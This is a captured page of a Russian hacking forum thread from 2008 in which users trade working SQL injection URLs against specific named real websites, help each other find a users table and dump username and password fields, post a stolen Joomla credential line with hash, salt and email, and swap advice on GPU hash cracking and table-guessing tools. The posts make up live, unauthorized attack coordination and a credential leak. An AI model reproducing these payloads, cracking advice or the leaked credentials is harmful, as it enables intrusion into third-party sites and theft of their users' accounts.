ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3671  
Старый 12.11.2008, 22:27
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,column_name ),2,3,4,5,6,7,8+from+information_schema.columns/* - пишет, что табла users есть
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+users/* - пишет ошибку... в чем проблема
 
Ответить с цитированием

  #3672  
Старый 12.11.2008, 22:27
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

2prescott
спасибо, меня интересовала исключительно идея скулы после limit с order by
 
Ответить с цитированием

  #3673  
Старый 12.11.2008, 22:30
Аватар для prescott
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

Цитата:
Сообщение от Tigger  
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,column_name ),2,3,4,5,6,7,8+from+information_schema.columns/* - пишет, что табла users есть
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+users/* - пишет ошибку... в чем проблема
Потомучто таблица в другой базе. Смотри так:
Код:
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,table_schema ),2,3,4,5,6,7,8+from+information_schema.columns/*
Она принадлежит базе test, вот запрос:
Код:
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+test.users/*
 
Ответить с цитированием

  #3674  
Старый 12.11.2008, 22:34
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Цитата:
пишет ошибку... в чем проблема
потому что таблица users в другой базе данных
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(username,0x3a,password),2,3 ,4,5,6,7,8+from+test.users/*

опередили...
 
Ответить с цитированием

  #3675  
Старый 12.11.2008, 22:47
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

чем расшифровать пасы от джумлы, подскажите чего-нить особо эффективное)

sotramxan:bffc841658e3eb534f41915454d2cd6b:mLvhGI5 BGHOuIKq7:sotramxan@sotramxan.com
 
Ответить с цитированием

  #3676  
Старый 12.11.2008, 22:56
Аватар для :{-VaigeR-}:
:{-VaigeR-}:
Новичок
Регистрация: 11.11.2008
Сообщений: 10
Провел на форуме:
16602

Репутация: 16
Отправить сообщение для :{-VaigeR-}: с помощью ICQ
По умолчанию

Цитата:
Сообщение от truelamer  
чем расшифровать пасы от джумлы, подскажите чего-нить особо эффективное)

sotramxan:bffc841658e3eb534f41915454d2cd6b:mLvhGI5 BGHOuIKq7:sotramxan@sotramxan.com
У лебедя попробуй, хешкрякинг рулит! Я вот сча не помню где-то видел короче написали програму которая хеши брутит через видюху, правда там ни все поддерживает видеокарты, но говорят скорость брута мега супер! Попробую сча найти!

ЗЫ Нашел, на держи - http://forum.insidepro.com/viewtopic.php?t=1983

Последний раз редактировалось :{-VaigeR-}:; 12.11.2008 в 23:01..
 
Ответить с цитированием

  #3677  
Старый 12.11.2008, 23:04
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Цитата:
У лебедя попробуй, хешкрякинг рулит!
если ты не заметил то тут джумла с солью и hashcracking.info не поможет
 
Ответить с цитированием

  #3678  
Старый 12.11.2008, 23:55
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.ascmfoot.freesurf.fr/joueur.php3?idj=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23/* - помогите найти таблицы, пожалуйста)) а лучше посоветуйте прогу для подбора таблиц по словорю,а то что-то найти не могу((
 
Ответить с цитированием

  #3679  
Старый 12.11.2008, 23:59
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от Tigger  
http://www.ascmfoot.freesurf.fr/joueur.php3?idj=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23/* - помогите найти таблицы, пожалуйста)) а лучше посоветуйте прогу для подбора таблиц по словорю,а то что-то найти не могу((
sipt к примеру
 
Ответить с цитированием

  #3680  
Старый 13.11.2008, 02:50
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' - не помню, как обойти(( помогите, пожалуйста!!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ